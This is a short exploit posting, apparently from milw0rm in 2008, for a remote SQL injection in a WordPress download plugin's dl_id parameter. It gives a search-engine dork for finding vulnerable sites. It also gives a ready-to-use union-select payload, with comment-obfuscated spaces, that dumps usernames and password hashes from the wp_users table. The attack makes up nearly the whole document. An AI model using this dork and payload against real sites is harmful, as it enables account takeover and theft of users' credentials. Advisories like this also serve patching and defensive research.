############################################################### # # Wordpress Plugin Download file Remote SQL Injection Vulnerability # ############################################################### # # Author: BL4CK # # Mail: bl4ck00@gmail.com # ################################################################ # # Dork: inurl:"wp-download.php?dl_id=" # ################################################################ Example: http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL] SQL: null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* ################################################################ # Greetz: ZioN, b!g B0$$, h4cky0u.org ################################################################ # milw0rm.com [2008-03-31]